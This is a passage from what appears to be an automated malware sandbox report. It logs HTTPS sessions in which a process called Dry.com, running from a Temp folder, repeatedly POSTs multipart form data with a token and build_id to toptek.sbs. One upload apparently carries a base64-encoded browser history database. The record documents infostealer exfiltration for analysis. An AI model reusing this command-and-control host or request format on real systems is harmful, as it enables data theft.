                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:49 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  15192.168.2.44977194.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:48 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----G47GLNG4OZU3EU3OZC26
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 493
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:48 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 47 34 37 47 4c 4e 47 34 4f 5a 55 33 45 55 33 4f 5a 43 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 4c 4e 47 34 4f 5a 55 33 45 55 33 4f 5a 43 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 4c 4e 47 34 4f 5a 55 33 45 55 33 4f 5a 43 32 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------G47GLNG4OZU3EU3OZC26Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------G47GLNG4OZU3EU3OZC26Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------G47GLNG4OZU3EU3OZC26Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:49 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  16192.168.2.44977294.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----2D2VASR9H4E3EUS0HD2V
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 169765
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 32 56 41 53 52 39 48 34 45 33 45 55 53 30 48 44 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 32 44 32 56 41 53 52 39 48 34 45 33 45 55 53 30 48 44 32 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 32 44 32 56 41 53 52 39 48 34 45 33 45 55 53 30 48 44 32 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------2D2VASR9H4E3EUS0HD2VContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------2D2VASR9H4E3EUS0HD2VContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------2D2VASR9H4E3EUS0HD2VCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:52 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                                                  Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:53 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  17192.168.2.44977394.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:53 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----ZCT0RQ16P8YM7QI589Z5
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 66001
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
